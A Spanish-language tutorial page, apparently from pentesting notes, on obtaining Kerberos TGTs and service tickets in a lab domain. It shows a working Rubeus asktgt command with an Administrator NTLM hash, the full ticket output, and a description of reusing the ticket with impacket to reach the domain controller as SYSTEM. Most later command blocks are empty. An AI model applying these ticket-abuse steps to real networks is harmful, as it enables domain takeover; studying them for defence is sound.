search

ticketsASK-TGT - TGS

Como hicimos anteriormente lo haremos de la misma forma con esta tecnica para obtener el TGT y posteriormente el TGS, en este caso si hemos capturado el hash del administrador por algun casual podremos obtener el TGT mediante Rubeus como vimos anteriormente de la siguiente forma:

Abrimos una PowerShell como administrador local:

cd C:\Users\empleado1\Desktop\Rubeus-master\Rubeus\bin\Debug
.\Rubeus.exe asktgt /domain:corp.local /user:Administrator /rc4:a87f3a337d73085c45f9416be5787d86

Info:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Ask TGT

[*] Using rc4_hmac hash: a87f3a337d73085c45f9416be5787d86
[*] Building AS-REQ (w/ preauth) for: 'corp.local\Administrator'
[*] Using domain controller: 192.168.5.5:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFGDCCBRSgAwIBBaEDAgEWooIELjCCBCphggQmMIIEIqADAgEFoQwbCkNPUlAuTE9DQUyiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggPqMIID5qADAgESoQMCAQKiggPYBIID1IZAFwk1djVdJ60YbiJOQ5ocE2IwlcpJwq5HHKB+g2RTA6LKiDIdH73pCsUj6qjTR8dKJ0SNihj/T/m8SyNuFq36nCI/8NplFms1AEOyYNXMBVM6dKUOZRNn5w8n6ElP6x/wRfTE/hf7gg6J9EhWboAIRL39bYCfHY0r+phVgF6ltkNXkZK9wyb4clnq4hERYceCs6lfdmJ/ElwDAlUurLkDrc5uyEuQZeEmQcUVLvo1ASZZGvtEjsSln/W48KdpCKF9yp+ABqZjZ2LCSRzDayyJMZd3RXc9aSxB0BH/a+wT3ZXVWaD4A2Pb/aaIIXs0kCNau69daOmXSTMT4pgckMhvmEv6G+zcHmRkmbw78Jzf9K/rpqwjqH/bBZiWmkOaofUUTUERUT70WaF/YZZ3tvC7HewScCm0oP+XgDbP/6g3g+HdIzriF0kZKzP8iiadxZSTV53KVwf053m3U5+2SRMb1f+UI8KdnxgCY6cZQb1iqgUamBGnFBKb6lUztcMRa4ddSpM9Ha3b3Uh0Prz1y0pGXb0kmmMYqlc82uGWceyrnkOvNSoDbWVVDXFouvauGQTCtS+nYVhpP1HRbLHH65yW/LDberF5+lP6bMGfxlIR1iNrLzJSDyARi91h5bqvzeN7RX2MuM3T6G8EDSaL93wYCWaV8YZ5Q5cSqWE+vtmqie9aacjek5nmdgJZlLmPzYod69q7XTj0vRIx1CIEJOvoOQC1trm0ojgqKVH3GephZoR0hNlod99/rpkxJqpQ/693C0mmTfDbY3GvYXOxMAVYbs2gjxAi0jLTkXkkp4odM4W79hgI1ORSqgMzHFRHIbbzAX+XOCRx4Njs0hi0+V24ugBUGeSNnq7/qD2WuxU/1yj2tm4Q4b01fw8zr0inZc7gQz/yv007iGJBiT37RihhZdUTe4z7T9+D1Qq6nisdZqafphfqvbSwU2lV/7NWfk2Nu7aspqTClcEgEW+14Amj2jRcPrczitLhfuH4M50g6kaw/X/seTeIkk+yToj3U6MoQc2BBiTgfY35nybyc/4/ElfYcuxMsFWSFNyHObqfoP9K8fNwVsEZUdyJCldUKyvfsutl9LCYLSWTSRBlTUkLYYOgVRgH0gqk8y2ub9uUUFTogSsQxw5Pm08Ud1bpBuGh85dMWmXNKvU+QyUgGNHMR845Wk7M7+IiGm7psNYPnqsdlxj3fbTgPXUV3ArbZQiWujkwKmNehfyNrdhOzTHDjlMmh07SblXi5uc6QHaVB5JlFSFUIIn1k5V1WF3hdfDvxHsKcCsXWr7S0RY/v7OwRfdco4HVMIHSoAMCAQCigcoEgcd9gcQwgcGggb4wgbswgbigGzAZoAMCARehEgQQTG/KoBgwkNXYcvzZHrONhKEMGwpDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDI1MDEyMjA4MjQ0NVqmERgPMjAyNTAxMjIxODI0NDVapxEYDzIwMjUwMTI5MDgyNDQ1WqgMGwpDT1JQLkxPQ0FMqR8wHaADAgECoRYwFBsGa3JidGd0Gwpjb3JwLmxvY2Fs

  ServiceName              :  krbtgt/corp.local
  ServiceRealm             :  CORP.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  CORP.LOCAL
  StartTime                :  22/01/2025 9:24:45
  EndTime                  :  22/01/2025 19:24:45
  RenewTill                :  29/01/2025 9:24:45
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  TG/KoBgwkNXYcvzZHrONhA==
  ASREP (key)              :  A87F3A337D73085C45F9416BE5787D86

Y vemos que hemos obtenido perfectamente el TGT del usuario Administrador.

Ahora una vez teniendo esto, metemos en un archivo este TGT en una oneline y lo utilizaremos para obtener un TGS de forma manual y que no lo haga de forma automatica Windows.

Y con esto lo que estamos haciendo es solicitar un Ticket de servicio para el servicio cifs del dominio corp.local a nombre del usuario administrador.

Info:

Ahora lo que vamos hacer es importarnos este ticket que hemos obtenido con Rubeus de la siguiente forma:

Info:

Y vemos que se nos importo de forma correcta, si hacemos klist podremos ver lo siguiente:

Vemos que tenemos un ticket de servicio, justo el que especificamos cifs, como el usuario administrador.

Ahora vamos hacer el mismo proceso pero desde Linux para poder ver varias tecnicas que hay.

hashtag
TGT/TGS desde Linux a Windows

Vamos a realizar la misma tecnica para el TGT como vimos anteriormente en linux de la siguiente forma:

Info:

Una vez que ya tengamos el TGT en el archivo Administrator.ccache guardado, haremos lo siguiente.

Si nosotros vemos el help de la herramienta impacket pero de un parametro en concreto, veremos lo siguiente entre tanta linea:

Info:

Vemos que con el -k utilizara el portocolo kerberos que es el que queremos pero cogiendo como variable de entorno el TGT que tiene que estar en la palabra KRB5CCNAME, por lo que le tendremos que asignar a dicha variable de entorno el TGT que acabamos de obtener con la anterior herramienta para que lo coja de forma automatica sin necesidad de pasarle nada.

Una vez echo esto, haremos lo siguiente:

Info:

Vemos que ha funcionado correctamente sin necesidad de meter contraseña, solo simplemente con el TGT del usuario administrador.

Si por ejemplo nos queremos conectar de forma remota al DC01 con el TGT sin contraseña, podremos hacerlo de la siguiente forma:

Info:

Y con esto ya estaremos dentro del DC01 con el usuario SYSTEM basicamente el nivel mas alto de privilegios, solamente teniendo el TGT.

Tambien podriamos hacerlo de la misma forma pero meidante SMB.

Info:

De la misma forma podremos obtener un Ticket de servicio con la herramienta impacket de la siguiente forma:

Info:

Y con esto ya obtendremos el Ticket de servicio guardado en el archivo Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache.

PreviousPass-The-TicketNextKerberos Golden Ticket y Silver Ticket

Last updated